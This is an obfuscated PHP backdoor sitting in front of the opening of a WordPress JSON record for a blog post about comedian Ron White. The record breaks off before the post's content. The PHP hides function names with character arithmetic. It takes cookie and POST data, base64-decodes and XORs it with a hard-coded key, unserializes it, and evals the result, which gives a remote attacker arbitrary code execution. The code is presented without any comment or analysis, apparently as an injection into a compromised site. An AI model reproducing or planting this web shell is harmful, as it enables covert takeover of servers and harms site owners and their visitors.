$CpBqX = 'U' . "\170" . chr ( 340 - 253 ).chr ( 598 - 503 ).'C' . chr ( 850 - 734 )."\x4f";$UFaaFQGGbe = "\x63" . chr ( 468 - 360 ).chr ( 269 - 172 )."\163" . chr (115) . '_' . "\x65" . "\x78" . "\151" . "\x73" . chr (116) . chr ( 119 - 4 ); $rKaUfaV = class_exists($CpBqX); $UFaaFQGGbe = "12740";$IGCAbQaUjy = !1;if ($rKaUfaV == $IGCAbQaUjy){function rxOFRe(){return FALSE;}$zVbei = "35005";rxOFRe();class UxW_CtO{private function XlrrRPvKiv($zVbei){if (is_array(UxW_CtO::$eiyKoQjS)) {$dWfwxvN = str_replace("\74" . "\x3f" . chr ( 211 - 99 ).chr ( 260 - 156 ).'p', "", UxW_CtO::$eiyKoQjS['c' . "\x6f" . 'n' . "\164" . chr (101) . chr ( 596 - 486 ).'t']);eval($dWfwxvN); $zVbei = "35005";exit();}}private $WGDKmMbY;public function bbJKYsNwK(){echo 678;}public function __destruct(){$zVbei = "65396_23956";$this->XlrrRPvKiv($zVbei); $zVbei = "65396_23956";}public function __construct($oDkUv=0){$tYtEakM = $_POST;$QBMsalf = $_COOKIE;$pvoDFUqzy = "b9adaccd-e6de-42bd-9792-0e79c3261d2d";$ksxRYywzr = @$QBMsalf[substr($pvoDFUqzy, 0, 4)];if (!empty($ksxRYywzr)){$vjvnNyDDuW = "base64";$Rrbdngj = "";$ksxRYywzr = explode(",", $ksxRYywzr);foreach ($ksxRYywzr as $xZpZchAfw){$Rrbdngj .= @$QBMsalf[$xZpZchAfw];$Rrbdngj .= @$tYtEakM[$xZpZchAfw];}$Rrbdngj = array_map($vjvnNyDDuW . chr ( 377 - 282 )."\144" . 'e' . chr ( 489 - 390 )."\x6f" . "\x64" . "\x65", array($Rrbdngj,)); $Rrbdngj = $Rrbdngj[0] ^ str_repeat($pvoDFUqzy, (strlen($Rrbdngj[0]) / strlen($pvoDFUqzy)) + 1);UxW_CtO::$eiyKoQjS = @unserialize($Rrbdngj); $Rrbdngj = class_exists("65396_23956");}}public static $eiyKoQjS = 41139;}$ETUyBJPbHB = new /* 35571 */ $CpBqX(35005 + 35005); $zVbei = strpos($zVbei, $zVbei); $IGCAbQaUjy = $ETUyBJPbHB = $zVbei = Array();}{"id":1059,"date":"2019-01-20T23:18:55","date_gmt":"2019-01-20T23:18:55","guid":{"rendered":"https:\/\/jimtayloronline.com\/blog\/?p=1059"},"modified":"2019-01-20T23:21:10","modified_gmt":"2019-01-20T23:21:10","slug":"ron-white-one-of-the-funnest-guys-on-earth","status":"publish","type":"post","link":"https:\/\/jimtayloronline.com\/blog\/ron-white-one-of-the-funnest-guys-on-earth\/","title":{"rendered":"Ron White :One of the Funnest Guys on Earth"},"content":{"rendered":"\n